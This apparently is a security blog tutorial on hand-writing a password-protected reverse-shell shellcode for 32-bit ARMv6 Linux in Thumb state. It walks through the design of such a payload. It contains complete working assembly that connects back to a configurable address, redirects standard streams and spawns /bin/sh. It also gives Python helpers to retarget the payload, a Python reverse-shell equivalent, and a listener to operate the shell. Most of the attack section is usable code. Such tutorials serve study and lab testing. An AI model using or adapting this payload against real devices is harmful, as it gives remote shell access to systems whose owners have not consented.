Developing Shellcode for IoT: A Password-Protected Reverse Shell for ARM Processors

After writing a similar payload for Linux/Intel x64, I was curious about how to apply this knowledge to other architectures. I decided to go with ARM since it’s an interesting and widespread one.

About ARM

ARM is a Reduced Instruction Set Computing (RISC) processor architecture that is used everywhere these days: mobile phones, smart thermostats, TVs, Wi-Fi dongles, cars, credit cards, you name it.

How does ARM compare against Intel x86?

Here are some key takeaways:

ARM is a RISC architecture, so its instruction set is simpler and considerably smaller than that of its 32-bit Intel counterpart, the x86.
While most x86 instructions can operate directly on memory, on ARM the data must be loaded from memory into registers before being operated on. Most ARM instructions operate only on registers. Only Load/Store instructions can access memory.
ARM has two main instruction set states: ARM and Thumb. In ARM state instructions are always 4 bytes long, while Thumb instructions are 2 bytes long most of the time. For shellcode writing, Thumb state is the de facto choice as it saves space and avoids a lot of null bytes.
ARM instructions can only encode a limited range of immediate values, so not every constant can be used directly with a mov instruction. If a number is out of this range it must be split into parts and built up using several instructions.
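
The immediate-range rule in the last point can be checked mechanically. The following is a minimal host-side sketch in Python, not part of the payload. The function names are my own, and it assumes the classic ARM-state encoding (an 8-bit value rotated right by an even amount) and the 16-bit Thumb mov encoding (an 8-bit immediate, 0 to 255).

```python
def is_arm_immediate(value):
    """True if value fits ARM state's 'imm8 rotated right by an even amount' form."""
    value &= 0xFFFFFFFF
    for rot in range(0, 32, 2):
        # Rotating left by `rot` undoes a rotate-right by `rot`.
        rotated = ((value << rot) | (value >> (32 - rot))) & 0xFFFFFFFF
        if rotated < 0x100:
            return True
    return False


def is_thumb_mov_immediate(value):
    """True if value fits the 8-bit immediate of a 16-bit Thumb mov."""
    return 0 <= value <= 0xFF


def split_for_thumb(value, max_part=0xFF):
    """Split value into one mov operand followed by add operands, each <= max_part."""
    if value <= 0:
        raise ValueError("value must be positive")
    parts = []
    while value > 0:
        part = min(value, max_part)
        parts.append(part)
        value -= part
    return parts


print(is_thumb_mov_immediate(281))  # the socket syscall number does not fit
print(split_for_thumb(281))         # one possible mov/add split
```

Any split that adds up to the target works. Later in this article I use 200 + 81 for the same number.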

How do I switch to Thumb state?

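To switch to Thumb state we can use the Branch and Exchange instruction (bx) with a destination register whose least significant bit is set to 1. While in ARM state, this can be achieved by adding 1 to the Program Counter (the pc register) and branching to the result. Reading pc in ARM state yields the address of the current instruction plus 8, so the result points just past the bx instruction.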

<some arm code>
 ...
// Here we are running on ARM state
 add r0, pc, #1
// Increase value of PC by 1 and place the result into r0
 bx  r0
// Branch & Exchange to the address in r0
// This will make the switch to Thumb state because the LSB of r0 = 1
// From here on we can execute Thumb state instructions!
 <some thumb code>
 ...
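
The address arithmetic behind the switch is easy to get wrong, so here is a small Python sketch of it. It is only an illustration: the helper names and the load address 0x10000 are assumptions of mine, and it relies on the fact that reading pc in ARM state yields the address of the current instruction plus 8.

```python
ARM_PC_READ_OFFSET = 8  # in ARM state, reading pc gives current instruction + 8


def thumb_switch_target(add_address):
    """Value left in r0 by `add r0, pc, #1` when that instruction sits at add_address."""
    return add_address + ARM_PC_READ_OFFSET + 1


def decode_bx(target):
    """Split a bx operand into (state, address): bit 0 selects the state and is cleared."""
    state = "thumb" if target & 1 else "arm"
    return state, target & ~1


r0 = thumb_switch_target(0x10000)   # the add is assumed to live at 0x10000
state, address = decode_bx(r0)
print(hex(r0), state, hex(address))
```

With the add at 0x10000 and the bx at 0x10004, the branch lands on 0x10008, which is exactly where the first Thumb instruction starts.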

From now on all the coding will be done in Thumb state since this is the relevant state for writing shellcode.

Setting up the lab

First of all, we’ll need a lab to run our tests on. Here are some options for it:

1. You can go for the real deal and test the payload on a real Raspberry Pi 1.

2. You can build/run an emulated environment using QEMU. Since I used the QEMU armv6_stretch image from this repo I’d recommend you use the same setup. It pretty much works out of the box, don’t worry.

3. You could download and use the VM provided by Azeria Labs.

Writing the payload

Stage One: General Overview

First of all, what are we trying to achieve here? Our goal is to write shellcode for the Linux 32-bit ARMv6 architecture that will connect back to a remote location over TCP/IPv4 and provide a shell only after the remote client provides a valid password. In order to write the payload, we need to chain several syscalls. The exact order is the following:

We create a new socket to manage the new connection.
We connect to the target address.
We read from the socket and check if the provided password is correct.
We duplicate the socket onto each standard stream (stdin, stdout and stderr) using the dup2 syscall, so everything the shell reads and writes travels over the connection.
We start a shell by using the execve syscall.
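
Before going down to assembly, the same chain can be sketched in a high-level language. The Python below is only a rough mirror of the five steps, under a few assumptions: the function names are mine, the password check is pulled out into its own helper, and a closed connection raises an error (the assembly version would simply keep looping). Python's os.execve also needs a non-empty argument list, whereas the shellcode passes NULL.

```python
import os
import socket


def wait_for_password(sock, password):
    """Read len(password) bytes at a time until they match; return the attempt count."""
    attempts = 0
    while True:
        attempts += 1
        data = sock.recv(len(password))
        if not data:
            # Deviation from the assembly, which would just keep looping.
            raise ConnectionError("peer closed before sending the password")
        if data == password:
            return attempts


def reverse_shell(host, port, password):
    """High-level mirror of the syscall chain; never returns on success."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  # socket(2, 1, 0)
    sock.connect((host, port))                                # connect
    wait_for_password(sock, password)                         # read + compare
    for fd in (2, 1, 0):                                      # dup2 onto stderr, stdout, stdin
        os.dup2(sock.fileno(), fd)
    os.execve("/bin/sh", ["/bin/sh"], {})                     # execve
```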

Each of these syscalls has a signature we need to honor: specific registers must hold specific values. For example, the r7 register identifies the syscall to execute, so it must always contain the syscall number, while the arguments go in r0, r1, r2 and so on. A whole document containing a full syscall table can be found here.


Stage Two: Writing a Syscall

Let’s see an example of how to write a syscall in ARM Thumb state. We’ll use the socket syscall:

         // [281] socket(2, 1, 0) 
02 20    mov   r0, #2    // loads immediate value 2 into r0
01 21    mov   r1, #1    // loads immediate value 1 into r1
52 40    eor   r2, r2    // zeroes out r2 by xoring it with itself
                         // 281 is out of range for immediate values
                         // It must be loaded in parts
c8 27    mov   r7, #200  // part1: loads immediate value 200 into r7
51 37    add   r7, #81   // part2: adds 81 to r7 (200 + 81 = 281, the syscall number)
01 df    svc   #1        // issues the syscall

Here you can see:

The r7 register being used to identify the syscall
Registers r0, r1, and r2 used as parameters for the syscall
An example of how to deal with immediate values that are out of range
The use of the svc instruction to perform a system call
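
The opcode bytes in the left column can be reproduced by hand, which also shows why some instruction choices matter for avoiding null bytes. The Python sketch below encodes only the four 16-bit Thumb forms used in the listing. The helper names are mine, and it assumes low registers (r0 to r7) and 8-bit immediates.

```python
import struct


def thumb_mov_imm(rd, imm8):
    """16-bit Thumb `mov rd, #imm8`, emitted little-endian."""
    return struct.pack("<H", 0x2000 | (rd << 8) | imm8)


def thumb_add_imm(rdn, imm8):
    """16-bit Thumb `add rdn, #imm8`."""
    return struct.pack("<H", 0x3000 | (rdn << 8) | imm8)


def thumb_eor(rdn, rm):
    """16-bit Thumb `eor rdn, rm`."""
    return struct.pack("<H", 0x4040 | (rm << 3) | rdn)


def thumb_svc(imm8):
    """16-bit Thumb `svc #imm8`."""
    return struct.pack("<H", 0xDF00 | imm8)


socket_call = b"".join([
    thumb_mov_imm(0, 2),    # mov r0, #2
    thumb_mov_imm(1, 1),    # mov r1, #1
    thumb_eor(2, 2),        # eor r2, r2
    thumb_mov_imm(7, 200),  # mov r7, #200
    thumb_add_imm(7, 81),   # add r7, #81
    thumb_svc(1),           # svc #1
])
print(socket_call.hex())
print(b"\x00" in socket_call)          # does the sequence contain a null byte?
print(b"\x00" in thumb_mov_imm(2, 0))  # what `mov r2, #0` would have cost us
print(b"\x00" in thumb_svc(0))         # what `svc #0` would have cost us
```

This is why r2 is cleared with eor instead of mov r2, #0, and why the syscall is issued with svc #1 instead of svc #0: both alternatives would encode a 0x00 byte.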

Stage Three: Writing the full payload

Armed with this knowledge, we are now ready to chain every syscall and put our payload together. The following Gist was extracted from the source code on my main repository:

// Password-Protected Reverse Shell Linux/ARMv6
// Author: Alan Vivona
// medium.syscall59.com
// @syscall59

.section .text
.global _start
_start:

.arm
    add   r3, pc, #1 // switch to thumb mode 
    bx    r3

.thumb

// [281] socket(2, 1, 0) 
    mov   r0, #2
    mov   r1, #1
    eor   r2, r2
    mov   r7, #200
    add   r7, #81
    svc   #1
    mov   r10, r0 // save sockfd into r10

// [283] connect(socketfd, target, addrlen) 
    // socket fd is in r0 already
    adr   r1, target
    strb  r2, [r1, #1] // replace the 0xff in the address family field with 0x00
    strb  r2, [r1, #5] // replace the 1st 255 in the IP field with 0
    strb  r2, [r1, #6] // replace the 2nd 255 in the IP field with 0
    mov   r2, #16      // addrlen = 16 (size of a sockaddr_in struct)
    add   r7, #2  // 281 + 2 = 283
    svc   #1

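// [003] read(sourcefd, destbuffer, amount)
    push  {r1}        // reserve 4 bytes on the stack to use as the read buffer
    mov   r1, sp      // r1 = buffer address
    mov   r2, #4      // r2 = password length in bytes
    mov   r7, #3      // r7 = 3 (read)
    read_pass:
        mov   r0, r10 // r0 = saved sockfd (r0 is overwritten by each syscall's return value)
        svc   #1
    check_pass:
        ldr   r3, pass    // r3 = expected password as a 32-bit word
        ldr   r4, [r1]    // r4 = the 4 bytes just received
        eor   r3, r3, r4  // the result is zero only if both words match
    bne read_pass         // keep reading until the password is correct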

// [063] dup2(sockfd, stdIO) 
    mov   r1, #2  // r1 = 2 (stderr)
    mov   r7, #63 // r7 = 63 (dup2)
    loop_stdio:
        mov   r0, r10 // r0 = saved sockfd 
        svc   #1
        sub   r1,#1
    bpl loop_stdio    // loop while r1 >= 0 

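// [011] execve(command, 0, 0) 
    adr   r0, command      // r0 = address of the "/bin/sh?" string
    eor   r2, r2           // r2 = 0 (envp = NULL)
    eor   r1, r1           // r1 = 0 (argv = NULL)
    strb  r2, [r0, #7]     // replace the trailing '?' with a null terminator
    mov   r7, #11          // r7 = 11 (execve)
    svc   #1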

// 2-byte alignment fix if needed (can't use a nop as it has a null byte)
// align_bytes : .byte 0xff, 0xff

target:
    // The 0xff will be replaced with a null at runtime
    .ascii "\x02\xff"   // Address family: AF_INET (2), i.e. IPv4
    
    .ascii "\x11\x5c"   // Port: 4444 (0x115c, network byte order)
    
    // Each 255 will be replaced with a 0 at runtime
    .byte 127,255,255,1 // IP: 127.0.0.1
    
command: .ascii "/bin/sh?"  // The '?' will be replaced with a null at runtime

pass: .ascii "S59!"
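
To point the payload at a different address, the bytes under the target label have to be regenerated, along with the strb offsets that patch the nulls back in. The following Python helper is a sketch of how that could be done. The function name and the 0xff filler convention are assumptions based on the listing above, and it only covers the first 8 bytes of the sockaddr_in struct, as the payload does.

```python
import socket
import struct


def build_target(ip, port, filler=0xFF):
    """Return (masked sockaddr_in prefix, offsets that must be zeroed at runtime)."""
    raw = struct.pack("<H", int(socket.AF_INET))  # address family, little-endian
    raw += struct.pack(">H", port)                # port, network byte order
    raw += socket.inet_aton(ip)                   # IPv4 address, network byte order
    null_offsets = [i for i, byte in enumerate(raw) if byte == 0]
    masked = bytes(filler if byte == 0 else byte for byte in raw)
    return masked, null_offsets


masked, null_offsets = build_target("127.0.0.1", 4444)
print(masked.hex(), null_offsets)
```

For 127.0.0.1:4444 the offsets come out as 1, 5 and 6, which are the three strb instructions in the connect block. A different IP or port may need a different set of strb instructions.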

Testing

When testing the payload, take into consideration that it was crafted for Linux 32-bit ARMv6 (the same chip the Raspberry Pi 1 has). Some tweaks may be needed for it to work on other platforms/architectures. In the following video, you can see the whole process of booting up the QEMU armv6 image, assembling the payload and, finally, running the test:

https://vimeo.com/331280681
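
If you'd rather script the receiving end of the test, a small Python listener does the job. This is a minimal sketch under my own assumptions: the function names are hypothetical, the defaults match the port and password hardcoded in the payload, and it only grabs the first chunk of the reply.

```python
import socket


def handle_connection(conn, password, command, timeout=2.0):
    """Unlock the shell with the password, run one command, return the first reply chunk."""
    conn.settimeout(timeout)
    # The payload reads exactly len(password) bytes; the rest is left for the shell.
    conn.sendall(password + command)
    return conn.recv(4096)


def listen_once(port, password=b"S59!", command=b"id\n", host="127.0.0.1"):
    """Wait for a single incoming connection and drive it with handle_connection."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as server:
        server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        server.bind((host, port))
        server.listen(1)
        conn, peer = server.accept()
        with conn:
            return peer, handle_connection(conn, password, command)
```

Calling listen_once(4444) before launching the payload on the same machine should return the peer address together with the output of the id command.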

That’s all! Hope you enjoyed this one!

The full source code can be found on my GitHub repo and Exploit-DB. Follow me on Twitter and Medium for more content like this!